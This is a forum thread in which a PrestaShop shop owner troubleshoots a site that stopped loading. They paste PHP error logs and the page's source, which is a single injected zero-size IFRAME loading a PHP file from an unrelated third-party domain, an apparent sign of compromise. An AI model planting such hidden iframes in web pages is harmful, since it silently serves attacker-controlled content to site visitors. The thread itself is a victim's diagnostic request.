Jump to content

Prestashop wont load


Recommended Posts

Hello,

 

as of today my prestashop website does not load.

I cannot access the control panel either.

The site is accessible via link:

http://zanaravno.si

 

While loading the site, i can see its waiting for files from facebook.com and gossip.it -- while nothing from gossip.it was ever loaded (according to website owner).

Interesting thing is, that english part of the website http://zanaravno.si/en/ does work normally.

 

Now, before restoring from full backup, i would like to solve this manually if anyone has any ideas on how to troubleshoot this kind of situation? Is there any monitoring tool that would log all the connections and data transfers website does upon load ?

 

Thnx for the help...

Link to comment
Share on other sites

If i check website source while its in this state, there is only 1 line of code:

 

<IFRAME SRC="http://www.cinelli.it/site/components/com_media/helpers/gossip.php" WIDTH=0 HEIGHT=0 ></IFRAME>

 

What could this be ?

Link to comment
Share on other sites

I'm adding error_log files:

 

Stack trace:
#0 /home/USER/public_html/classes/Mail.php(176): Swift_Message->attach(Object(Swift_Message_Part))
#1 /home/USER/public_html/controllers/AuthController.php(168): MailCore::Send(6, 'account', 'Registracija us...', Array, 'name.lastname10@...', 'mail')
#2 /home/USER/public_html/classes/FrontController.php(63): AuthControllerCore->preProcess()
#3 /home/USER/public_html/authentication.php(29): FrontControllerCore->run()
#4 {main}
 thrown in /home/USER/public_html/tools/swift/Swift/Message.php on line 542
[07-Dec-2012 23:35:01] PHP Warning:  Cannot modify header information - headers already sent by (output started at /home/USER/public_html/config/settings.inc.php:24) in /home/USER/public_html/classes/Cookie.php on line 300
[07-Dec-2012 23:35:01] PHP Warning:  Cannot modify header information - headers already sent by (output started at /home/USER/public_html/config/settings.inc.php:24) in /home/USER/public_html/classes/Cookie.php on line 300
[07-Dec-2012 23:35:01] PHP Warning:  Cannot modify header information - headers already sent by (output started at /home/USER/public_html/config/settings.inc.php:24) in /home/USER/public_html/classes/Cookie.php on line 300
[07-Dec-2012 23:35:01] PHP Warning:  Cannot modify header information - headers already sent by (output started at /home/USER/public_html/config/settings.inc.php:24) in /home/USER/public_html/classes/FrontController.php on line 464
[07-Dec-2012 23:35:01] PHP Warning:  Cannot modify header information - headers already sent by (output started at /home/USER/public_html/config/settings.inc.php:24) in /home/USER/public_html/classes/Cookie.php on line 300
[07-Dec-2012 23:35:01] PHP Warning:  Cannot modify header information - headers already sent by (output started at /home/USER/public_html/config/settings.inc.php:24) in /home/USER/public_html/classes/Cookie.php on line 300
[07-Dec-2012 23:36:07] PHP Warning:  Cannot modify header information - headers already sent by (output started at /home/USER/public_html/config/settings.inc.php:24) in /home/USER/public_html/classes/Cookie.php on line 300
[07-Dec-2012 23:36:07] PHP Warning:  Cannot modify header information - headers already sent by (output started at /home/USER/public_html/config/settings.inc.php:24) in /home/USER/public_html/classes/Cookie.php on line 300
[07-Dec-2012 23:36:07] PHP Warning:  Cannot modify header information - headers already sent by (output started at /home/USER/public_html/config/settings.inc.php:24) in /home/USER/public_html/classes/Cookie.php on line 300
[07-Dec-2012 23:36:07] PHP Warning:  Cannot modify header information - headers already sent by (output started at /home/USER/public_html/config/settings.inc.php:24) in /home/USER/public_html/classes/FrontController.php on line 464

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...